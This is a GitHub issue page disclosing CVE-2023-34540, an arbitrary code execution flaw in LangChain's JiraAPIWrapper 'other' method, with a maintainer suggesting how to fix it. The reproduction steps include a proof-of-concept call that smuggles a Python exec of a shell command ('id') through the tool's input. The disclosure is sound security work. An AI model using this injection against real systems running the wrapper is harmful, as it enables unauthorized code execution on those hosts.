CVE-2023-34540: Arbitrary code execution in JiraAPIWrapper · Issue #4833 · hwchase17/langchain

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

0gur1 opened this issue

May 17, 2023

· 1 comment

Open

Arbitrary code execution in JiraAPIWrapper #4833

0gur1 opened this issue

May 17, 2023

· 1 comment

Comments

System Info

LangChain version:0.0.171
windows 10

Who can help?

No response

Information

• The official example notebooks/scripts
• My own modified scripts

Related Components

• LLMs/Chat Models
• Embedding Models
• Prompts / Prompt Templates / Prompt Selectors
• Output Parsers
• Document Loaders
• Vector Stores / Retrievers
• Memory
• Agents / Agent Executors
• Tools / Toolkits
• Chains
• Callbacks/Tracing
• Async

Reproduction

1. Set the environment variables for jira and openai

import os from langchain.utilities.jira import JiraAPIWrapper os.environ[“JIRA_API_TOKEN”] = “your jira api token” os.environ[“JIRA_USERNAME”] = “your username” os.environ[“JIRA_INSTANCE_URL”] = “your url” os.environ[“OPENAI_API_KEY”] = “your openai key”

2. Run jira

jira = JiraAPIWrapper() output = jira.run('other’,"exec(\"import os;print(os.popen(‘id’).read())\")")

3. The id command will be executed.
   Commands can be change to others and attackers can execute arbitrary code.

Expected behavior

The code can be executed without any check.

@zywilliamli @hwchase17

I think the options here are to either a) check code to a limited number of allowed actions, or b) remove the “other” method from the tool.

It looks like we want the jira tool to:

1. Create an issue
2. search jira
3. get projects

I’m not sure what other functionality we want to extend to with self.other, maybe y’all know how to proceed best

2 participants